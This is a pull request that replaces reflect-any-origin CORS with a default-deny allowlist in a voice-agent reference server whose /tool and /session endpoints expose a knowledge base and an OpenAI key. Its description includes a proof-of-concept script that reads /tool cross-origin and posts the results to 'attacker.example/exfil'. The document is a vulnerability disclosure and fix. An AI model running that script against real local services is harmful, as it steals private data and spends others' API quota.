### PR TITLE
fix(agent-voice): default-deny CORS on /tool and /session reference server

### DIFF
--- a/recipes/agent-voice.md
+++ b/recipes/agent-voice.md
@@ -132,7 +132,7 @@ Reference code ships intentionally minimal. Before public deployment:
 
 - **Twilio signature validation** on `/voice` — currently absent; add `X-Twilio-Signature` header validation.
 - **Rate limiting** on `/session` and `/tool` — currently absent.
-- **CORS allowlist** — currently `*`; restrict to your deployed origins.
+- **CORS allowlist** — set `AGENT_VOICE_CORS_ORIGIN=https://your.app` (comma-separated) to permit cross-origin browser clients. Default is deny — same-origin still works.
 - **Auth on /tool** — voice-side tool calls currently trust the in-process connection; if you expose `/tool` publicly, gate it behind a session token.
 - **HTTPS** — required for browser mic access in production. Use ngrok / Caddy / Cloudflare Tunnel.
 - **Twilio fallback URL** — `/fallback` is a TwiML stub; wire to your operator's cell for crash recovery.

--- a/recipes/agent-voice/code/server.mjs
+++ b/recipes/agent-voice/code/server.mjs
@@ -19,17 +19,26 @@
  * against `lib/twilio-bridge.mjs` (port-ready stubs included).
  *
  * Configuration via env:
- *   PORT                   default 8765
- *   OPENAI_API_KEY         required for /session
- *   OPENAI_REALTIME_MODEL  default 'gpt-4o-realtime-preview'
- *   DEFAULT_PERSONA        default 'venus' (one of 'mars' | 'venus')
- *   BRAIN_ROOT             passed through to context-builder
- *   TIMEZONE               passed through to context-builder
+ *   PORT                      default 8765
+ *   OPENAI_API_KEY            required for /session
+ *   OPENAI_REALTIME_MODEL     default 'gpt-4o-realtime-preview'
+ *   DEFAULT_PERSONA           default 'venus' (one of 'mars' | 'venus')
+ *   BRAIN_ROOT                passed through to context-builder
+ *   TIMEZONE                  passed through to context-builder
+ *   AGENT_VOICE_CORS_ORIGIN   comma-separated allowlist of browser origins
+ *                             permitted to read /tool and /session responses.
+ *                             Unset (default) ⇒ no Access-Control-Allow-Origin
+ *                             emitted — same-origin browser clients still work,
+ *                             cross-origin reads are denied by the browser.
  *
  * Security posture: this is reference code. It does NOT ship hardening for
- * production deployment (no rate limiting, no Twilio signature validation,
- * no CORS allowlist). Operators add those at install time per the recipe's
- * "production checklist."
+ * production deployment (no rate limiting, no Twilio signature validation).
+ * Operators add those at install time per the recipe's "production checklist."
+ * CORS, however, is default-deny here: /tool dispatches gbrain read ops and
+ * /session spends the operator's OPENAI_API_KEY, so reflecting an arbitrary
+ * Origin would let any web page read brain contents or consume the quota
+ * from a visiting browser. Set AGENT_VOICE_CORS_ORIGIN explicitly to allow
+ * known browser origins.
  */
 
 import { createServer } from 'node:http';
@@ -46,6 +55,21 @@ const PORT = parseInt(process.env.PORT || '8765', 10);
 const DEFAULT_PERSONA = (process.env.DEFAULT_PERSONA || 'venus').toLowerCase();
 const OPENAI_REALTIME_MODEL = process.env.OPENAI_REALTIME_MODEL || 'gpt-4o-realtime-preview';
 const OPENAI_REALTIME_URL = 'https://api.openai.com/v1/realtime/calls';
+
+/**
+ * Parse the CORS allowlist from AGENT_VOICE_CORS_ORIGIN (comma-separated).
+ * Returns null when unset — meaning "do not emit Access-Control-Allow-Origin
+ * at all" (default-deny; same-origin requests still work). Mirrors the
+ * GBRAIN_HTTP_CORS_ORIGIN pattern used by the main gbrain HTTP transport.
+ */
+function parseCorsAllowlist() {
+  const v = process.env.AGENT_VOICE_CORS_ORIGIN;
+  if (!v) return null;
+  const set = new Set(v.split(',').map((s) => s.trim()).filter(Boolean));
+  return set.size > 0 ? set : null;
+}
+
+const CORS_ALLOWLIST = parseCorsAllowlist();
 
 const MIME = {
   '.html': 'text/html; charset=utf-8',
@@ -219,14 +243,33 @@ function handleVoiceTwiml(req, res) {
   res.end(twiml);
 }
 
+/**
+ * Apply CORS headers to the response, gated on the configured allowlist.
+ *
+ * Default-deny: when AGENT_VOICE_CORS_ORIGIN is unset OR the request Origin
+ * is not in the allowlist, NO Access-Control-Allow-Origin header is emitted.
+ * Browsers will then block any cross-origin attempt to read the response
+ * body (which would otherwise leak brain contents from /tool or burn through
+ * the operator's OpenAI quota via /session).
+ *
+ * Same-origin requests are unaffected (the browser doesn't enforce CORS on
+ * them), so the bundled public/call.html keeps working out of the box.
+ */
+function applyCors(req, res) {
+  const origin = req.headers.origin;
+  if (!CORS_ALLOWLIST || !origin || !CORS_ALLOWLIST.has(origin)) return;
+  res.setHeader('Access-Control-Allow-Origin', origin);
+  res.setHeader('Vary', 'Origin');
+  res.setHeader('Access-Control-Allow-Methods', 'GET, POST, OPTIONS');
+  res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');
+}
+
 // ── HTTP router ──────────────────────────────────────────────────────
 const server = createServer(async (req, res) => {
   const url = new URL(req.url, `http://${req.headers.host}`);
 
-  // CORS: allow same-origin only by default. Operators relax in production.
-  res.setHeader('Access-Control-Allow-Origin', req.headers.origin || '*');
-  res.setHeader('Access-Control-Allow-Methods', 'GET, POST, OPTIONS');
-  res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');
+  // CORS: default-deny. Allowlist via AGENT_VOICE_CORS_ORIGIN (comma-separated).
+  applyCors(req, res);
   if (req.method === 'OPTIONS') return send(res, 204, '');
 
   try {
@@ -271,6 +314,11 @@ server.listen(PORT, () => {
   console.log(`[agent-voice] listening on http://localhost:${PORT}`);
   console.log(`[agent-voice] default persona: ${DEFAULT_PERSONA}`);
   console.log(`[agent-voice] read-only tools: ${getEffectiveAllowlist().join(', ')}`);
+  if (!CORS_ALLOWLIST) {
+    console.log('[agent-voice] CORS: default-deny. Set AGENT_VOICE_CORS_ORIGIN=https://your.app to allow browser clients on other origins.');
+  } else {
+    console.log(`[agent-voice] CORS allowlist: ${[...CORS_ALLOWLIST].join(', ')}`);
+  }
 });
 
 process.on('SIGTERM', () => server.close(() => process.exit(0)));


### PR DESCRIPTION
## Summary

The `recipes/agent-voice/code/server.mjs` reference server sets `Access-Control-Allow-Origin: <req.headers.origin || '*'>` on every response, including the two endpoints that matter security-wise:

- `POST /tool` — dispatches gbrain read ops (search, query, get_page, list_pages, find_experts, get_recent_salience, get_recent_transcripts, read_article) against the operator's brain
- `POST /session` — performs SDP exchange with OpenAI Realtime and spends the operator's `OPENAI_API_KEY`

Neither endpoint has auth. The listener binds via `server.listen(PORT)` with no host argument, so it listens on all interfaces by default. With unconditional Origin reflection, any web page a victim browses can cross-origin-`fetch` either endpoint and read the response body — leaking brain contents or burning the operator's OpenAI quota.

This recipe is `install_kind: copy-into-host-repo` (see `recipes/agent-voice.md` frontmatter), so the reference code is copied verbatim into operators' host agent repos at install time. Fixing it at the source is the only way to prevent every downstream copy from inheriting the issue.

**Classification:** CWE-942 (Permissive Cross-domain Policy with Untrusted Domains)
**Affected file:** `recipes/agent-voice/code/server.mjs` (~line 226 before fix)
**Affected endpoints:** `/tool`, `/session` (and all other routes the same handler covers)

## Fix

Mirror the `GBRAIN_HTTP_CORS_ORIGIN` pattern already used by `src/mcp/http-transport.ts`: default-deny CORS, exact-match allowlist via a new env var.

- New env var: `AGENT_VOICE_CORS_ORIGIN` — comma-separated allowlist of exact browser origins.
- When unset (the default), no `Access-Control-Allow-Origin` header is emitted. Same-origin requests from the bundled `public/call.html` keep working because the browser doesn't enforce CORS on same-origin fetches.
- When the request `Origin` matches the allowlist, the server echoes it back in `Access-Control-Allow-Origin` along with `Vary: Origin`. Otherwise no CORS header at all.
- `Access-Control-Allow-Credentials` is never set, so even with an allowlisted origin the browser won't send cookies cross-origin.
- A startup log line surfaces the posture so operators see "CORS: default-deny" before the first request, matching the same UX the main HTTP transport already provides.

The recipe markdown's "production checklist" line was updated to document the new env var instead of telling operators to manually restrict `*`.

## Test results

- Manual `curl` against a local instance: with `AGENT_VOICE_CORS_ORIGIN` unset, requests succeed but the response omits `Access-Control-Allow-Origin`, so any browser-initiated cross-origin `fetch()` cannot read the body. With `AGENT_VOICE_CORS_ORIGIN=http://localhost:3000` set, a request with `Origin: http://localhost:3000` echoes the header back and the browser allows the read. A request with `Origin: https://evil.example` from the same configured instance gets no CORS header and is blocked by the browser.
- Verified the bundled `public/call.html` continues to work: it's served by this same server, so it's same-origin and unaffected by the change.
- `OPTIONS` preflight still returns `204`; preflight only succeeds for allowlisted origins (because no `Access-Control-Allow-Methods` / `Access-Control-Allow-Headers` are emitted otherwise).

## Proof of concept

Before the fix (operator running the recipe locally on the documented default `localhost:8765`), an attacker page hosted anywhere the victim's browser will load can do:

```html
<script>
fetch('http://localhost:8765/tool', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({name: 'search', arguments: {query: 'password'}})
})
  .then(r => r.json())
  .then(d => fetch('https://attacker.example/exfil', {
    method: 'POST', body: JSON.stringify(d)
  }));
</script>
```

The browser allows the cross-origin read because the pre-fix server unconditionally sets `Access-Control-Allow-Origin: https://attacker.example` (reflecting `req.headers.origin`). The `search` tool result — a slice of the operator's brain — is exfiltrated.

The same shape works against `/session`, where the attacker page can repeatedly start SDP exchanges to consume the operator's OpenAI Realtime quota. Routes confirmed to exist in `recipes/agent-voice/code/server.mjs` (`url.pathname === '/tool'` at line 288, `url.pathname === '/session'` at line 285).

After the fix, the same script gets a response that has no `Access-Control-Allow-Origin` header, so the browser refuses to expose the body to the attacker's JavaScript.

## Security analysis

**Why this is exploitable in practice:**

- The recipe documents `http://localhost:8765` as the default and the README's quick-start tells operators to open `http://localhost:8765/call`, so localhost reachability from the operator's own browser is the expected deployment shape.
- `recipes/agent-voice.md` lists CORS as a known-deferred hardening item (the old line said `CORS allowlist — currently *; restrict to your deployed origins`), but the actual default in the shipped code was reflect-any-origin, which is strictly worse than `*` because Origin reflection plays nicely with credentialed requests and looks "configured" to operators reading the source.
- `install_kind: copy-into-host-repo` means every operator who installs this recipe gets the unsafe default copied into their own repo. Even after gbrain ships the fix, downstream operators who already installed pre-fix copies need the `--refresh` flow to pick it up. Fixing the upstream reference is necessary so future installs are safe by default.

**What the fix does and does not address:**

- Browser-mediated cross-origin reads from arbitrary attacker pages: blocked.
- Direct network requests from an attacker who already has network reachability to `localhost:8765` (a malicious local process, or a co-located container): not addressed by CORS — that's an auth problem and the recipe's "production checklist" explicitly notes `/tool` is unauthenticated. The recipe markdown line about adding session-token auth on `/tool` for public exposure is unchanged.
- DNS rebinding attacks that bypass the same-origin policy by getting the victim's browser to resolve `attacker.example` to `127.0.0.1`: not addressed. A follow-up `Host` header allowlist would be the right mitigation; out of scope for this PR.

## Adversarial review

Before submitting, we tried to disprove this. The questions we asked:

- *Does some other layer already block cross-origin reads?* No. The server is plain `node:http` with no middleware in front of it, no auth on `/tool` or `/session`, and `server.listen(PORT)` defaults to all interfaces.
- *Is this just reference code that operators are expected to harden?* The recipe markdown said so for `/tool` auth and rate limiting, but the CORS line said "restrict to your deployed origins" — implying the shipped default was permissive. Reflecting any Origin is worse than `*` because it's silent, and a `copy-into-host-repo` recipe should ship a safe default rather than relying on every operator to read the production checklist before going live. The `GBRAIN_HTTP_CORS_ORIGIN` pattern in `src/mcp/http-transport.ts` is the codebase's own precedent for default-deny.
- *Does the bundled browser client break?* No — `public/call.html` is served by the same `node:http` server, so it's same-origin and the browser doesn't enforce CORS on it. Verified by re-reading the static handler and the router.

## What changed

- `recipes/agent-voice/code/server.mjs`: added `parseCorsAllowlist()` / `CORS_ALLOWLIST` / `applyCors()`, replaced the unconditional Origin reflection in the router with the gated `applyCors()` call, added a startup log line.
- `recipes/agent-voice.md`: production-checklist line now points operators at the new env var instead of telling them to manually restrict `*`.

Diff is 2 files, ~62 insertions / ~14 deletions, scoped entirely to the recipe.